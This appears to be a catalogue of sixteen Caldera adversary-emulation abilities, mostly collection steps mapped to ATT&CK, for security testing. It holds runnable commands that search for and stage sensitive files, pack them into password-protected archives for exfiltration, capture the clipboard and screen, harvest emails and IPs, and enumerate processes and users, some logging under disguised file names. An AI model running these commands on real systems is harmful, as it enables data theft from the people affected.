Caldera emulation abilities
16 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
Abilities
Advanced File Search and Stager
Highly configurable file finder and stager for Linux and Windows. Drops a payload file to the host to parse
arguments rather than running multiple commands for each fact (e.g., each file type). This ability allows for a safe
mode, only staging files found that have the appropriate file ending. The staging directory is configurable but
defaults to the current user's Recycle Bin (Windows) and /tmp (Linux). Payload files include default values for all
parameters (matching the base fact source - File Search and Stage). Options for searches: file extensions (include,
exclude [windows]), directories (include, exclude), accessed date cutoff, modified date cutoff, sensitive search
strings in files or titles.
[
  {"platform": "windows", "executor": "psh", "command": ".\\file_search.ps1 -Extensions '#{windows.included.extensions}' -ExcludedExtensions '#{windows.excluded.extensions}'\n -Directories '#{windows.included.directories}' -ExcludedDirectories '#{windows.excluded.directories}'\n -AccessedCutoff #{file.last.accessed} -ModifiedCutoff #{file.last.modified}\n -SearchStrings '#{file.sensitive.content}' -StagingDirectory '#{windows.staging.location}'\n -SafeMode $#{safe.mode.enabled} -PseudoExtension #{pseudo.data.identifier}\n"},
  {"platform": "linux", "executor": "sh", "command": "chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'\n --directories '#{linux.included.directories}' --exclude-dir '#{linux.excluded.directories}'\n --accessed '#{file.last.accessed}' --modified '#{file.last.modified}' --search-strings '#{file.sensitive.content}'\n --staging-directory '#{linux.staging.location}' --safe-mode '#{safe.mode.enabled}' --pseudo-ext '#{pseudo.data.identifier}'\n"}
]

Compress staged directory (Password Protected)
This ability packages staged files into a password-protected archive. Note: requires 7-Zip on Windows and GPG version 2.1+ on Linux.
[
  {"platform": "linux", "executor": "sh", "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n"},
  {"platform": "windows", "executor": "psh", "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n"}
]

Copy Clipboard
Copy the contents of the clipboard and print them.
[
  {"platform": "darwin", "executor": "sh", "command": "pbpaste\n"},
  {"platform": "windows", "executor": "psh,pwsh", "command": "Get-Clipboard -raw\n"},
  {"platform": "linux", "executor": "sh", "command": "xclip -o\n"}
]

Create staging directory
Create a directory for exfil staging.
[
  {"platform": "darwin", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"},
  {"platform": "linux", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"},
  {"platform": "windows", "executor": "psh,pwsh", "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n"}
]

Find Git Repositories
This ability will locate directories that are cloned Git repositories.
[
  {"platform": "linux", "executor": "sh", "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n"},
  {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n"}
]

Find IP addresses
Grep the user's home directory for IP addresses.
[
  {"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n"}
]

Find company emails
Grep the user's home directory for email addresses at the target company's domain.
[
  {"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n"}
]

Find files
Locate files deemed sensitive
[
  {"platform": "darwin", "executor": "sh", "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"},
  {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n"},
  {"platform": "linux", "executor": "sh", "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}
]

Parse SSH config
List the host entries in the SSH config file (via stormssh).
[
  {"platform": "darwin", "executor": "sh", "command": "pip install stormssh && storm list\n"},
  {"platform": "linux", "executor": "sh", "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n"}
]

PowerShell information gathering
System Information Gathering Script
[
  {"platform": "windows", "executor": "psh,pwsh", "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";"}
]

Screen Capture
Capture the contents of the screen.
[
  {"platform": "darwin", "executor": "sh", "command": "for i in {1..5}; do screencapture -t png screen-$i.png; echo \"$(cd \"$(dirname \"$1\")\"; pwd -P)/$(basename \"screen-$i.png\")\"; sleep 5; done;\n"},
  {"platform": "windows", "executor": "psh,pwsh", "command": "$loadResult = [Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\");\nfunction screenshot([Drawing.Rectangle]$bounds, $path) {\n $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height;\n $graphics = [Drawing.Graphics]::FromImage($bmp);\n $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size);\n $bmp.Save($path);\n $graphics.Dispose();\n $bmp.Dispose();\n}\nif ($loadResult) {\n $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1000, 900);\n $dest = \"$HOME\\Desktop\\screenshot.png\";\n screenshot $bounds $dest;\n if (Test-Path -Path $dest) {\n $dest;\n exit 0;\n };\n};\nexit 1;\n"}
]

Stage sensitive files
Copy files to the staging directory.
[
  {"platform": "darwin", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"},
  {"platform": "linux", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"},
  {"platform": "windows", "executor": "psh", "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"},
  {"platform": "windows", "executor": "cmd", "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}
]

SysInternals PSTool Process Discovery
Process discovery via the SysInternals PSTools pslist utility.
[
  {"platform": "windows", "executor": "psh,pwsh", "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n"}
]

WMIC Process Enumeration
Capture each process's executable path, name, PID and parent PID, writing the output to a log file on disk and then printing it.
[
  {"platform": "windows", "executor": "psh", "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n"}
]

cURL socket address
See the raw content of a socket
[
  {"platform": "darwin", "executor": "sh", "command": "curl #{remote.host.socket}\n"},
  {"platform": "linux", "executor": "sh", "command": "curl #{remote.host.socket}\n"}
]

cmd.exe information gathering
User, privilege and network connection enumeration via cmd.exe.
[
  {"platform": "windows", "executor": "psh", "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;"}
]